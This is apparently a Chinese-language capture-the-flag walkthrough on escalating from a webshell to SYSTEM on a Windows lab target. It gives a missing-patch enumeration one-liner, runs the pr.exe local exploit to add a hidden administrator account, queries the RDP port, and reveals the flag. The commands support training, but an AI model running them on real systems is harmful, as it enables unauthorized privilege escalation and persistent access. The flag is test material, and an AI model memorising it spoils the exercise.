第六章、SYSTEM!POWER
阿新 • • 發佈:2021-12-20
第六章 SYSTEM!POWER
0x01. 明確目標
https://hack.zkaq.cn/battle/target?id=3eb7bec4a7e95297
嘿嘿 , 不知道你笑了沒 , 點選傳送門 , 發現點不開 , 之好點選備用傳送門了 , 嘿嘿
四層相識的感覺 , 廢話不就是上一章那webshell的站點嗎 , ok 通過webshell 提權 , 然後flag在c盤根目錄下
獲取webshell的方法 , 我就不介紹了 , 直接看第五章即可
0x02. 提權
嘗試直接讀取c:\flag.txt , 發現果然沒有許可權
在caidao開啟終端 , 檢視當前使用者許可權
發現拒絕訪問 , 也就是當前使用者的許可權 , 不能執行預設的cmd.exe , 我們可以嘗試自己上傳一個cmd.exe到可執行
目錄下 , 注意這臺靶機是32位的 , 要用32位的cmd.exe
緊接著在菜刀中設定終端為當前上傳的cmd.exe
setp D:\05\06\UploadFiles\cmd.exe
通過命令檢視可利用的exp提權漏洞
systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB952004 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt
發現沒有打KB952004這個補丁 , 可以通過PR提權 , 上傳pr
通過pr.exe執行系統命令 , 提權成功
0x03. 獲取flag
接下來做的就是新增管理員賬號 , 3389遠端連線靶機 , 檢視flag
新增管理員賬號
pr.exe "net user yjh 123456 /add"
pr.exe "net localgroup administrators yjh /add"
檢視是否開否終端服務以及對應的埠是否為3389
net start
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
0xd3d轉換成十進位制就是3389
使用遠端桌面連線 , 連線靶機
win + r --> 輸入 迷失天使城的首字母(mstac) --> 回車 , 輸入靶機的公網ip
59.63.200.79
哎呦一激動忘記截圖了 , 我相信各位師傅你們都會
獲取flag
zkz{F3ck_power_sysstem}